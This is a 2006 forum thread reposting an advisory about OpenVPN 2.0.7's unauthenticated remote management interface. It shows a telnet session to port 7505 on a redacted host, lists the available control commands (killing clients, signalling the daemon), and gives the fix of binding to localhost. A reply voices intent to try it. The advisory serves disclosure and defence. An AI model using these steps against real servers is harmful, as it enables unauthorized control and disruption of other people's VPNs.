OpenVPN 2.0.7 and below: Remote OpenVPN Management Interface Flaw

Discussion in 'Forum for discussion of ANTICHAT' started by NeMiNeM, 4 May 2006.

  1. NeMiNeM

    NeMiNeM, Elder

    Code:
    There is a flaw (well, more a stupid design than anything else) in OpenVPN
    2.0.7 (and below) in the Remote Management Interface that allows an
    attacker to gain complete control because there is NO AUTHENTICATION (YES, NO
    AUTHENTICATION AT ALL!). This can be carried out from within the LAN that
    the OpenVPN server is running on, over the VPN itself or via the internet.
    This happens because the management interface can be bound to an
    internet-accessible IP address. Not good!
    
    Simply telnet to the OpenVPN server running the remote management interface
    on port 7505.
    
    root@trinity# telnet ********* 7505
    Trying *********...
    Connected to *********.
    Escape character is '^]'.
    >INFO:OpenVPN Management Interface Version 1 -- type 'help' for more info
    help
    Management Interface for OpenVPN 2.0_rc14 i686-suse-linux [SSL] [LZO]
    [EPOLL] built on Feb 3 2005
    Commands:
    echo [on|off] [N|all] : Like log, but only show messages in echo buffer.
    exit|quit : Close management session.
    help : Print this message.
    hold [on|off|release] : Set/show hold flag to on/off state, or
    release current hold and start tunnel.
    kill cn : Kill the client instance(s) having common name cn.
    kill IP:port : Kill the client instance connecting from IP:port.
    log [on|off] [N|all] : Turn on/off realtime log display
    + show last N lines or 'all' for entire history.
    mute [n] : Set log mute level to n, or show level if n is
    absent.
    net : (Windows only) Show network info and routing table.
    password type p : Enter password p for a queried OpenVPN password.
    signal s : Send signal s to daemon,
    s = SIGHUP|SIGTERM|SIGUSR1|SIGUSR2.
    state [on|off] [N|all] : Like log, but show state history.
    status [n] : Show current daemon status info using format #n.
    test n : Produce n lines of output for testing/debugging.
    username type u : Enter username u for a queried OpenVPN username.
    verb [n] : Set log verbosity level to n, or show if n is
    absent.
    version : Show current version number.
    END
    exit
    Connection closed by foreign host.
    root@trinity#
    
    The fix? Make sure you bind the remote management interface to 127.0.0.1 or
    a local network address (however, the latter will not stop you getting pwned
    internally, obviously).
    
    A quote from the OpenVPN guys themselves:
    
    "The management protocol is currently cleartext without an explicit security
    layer. For this reason, it is recommended that the management interface
    either listen on localhost (127.0.0.1) or on the local VPN address. It's
    possible to remotely connect to the management interface over the VPN
    itself, though some capabilities will be limited in this mode, such as the
    ability to provide private key passwords."
    
    "Future versions of the management interface may allow out-of-band
    connections (i.e. not over the VPN) and secured with SSL/TLS."
    
    OMG *&$%*%# software vendors, please don't release stuff without
    authentication!
    
    c0redump
    #hacktech @ undernet
    securityfocus.com
     
  2. virgoz

    virgoz, Elder

    Interesting. Will have to try it sometime...
     
    #2 virgoz, 4 May 2006
    Last edited by a moderator: 4 May 2006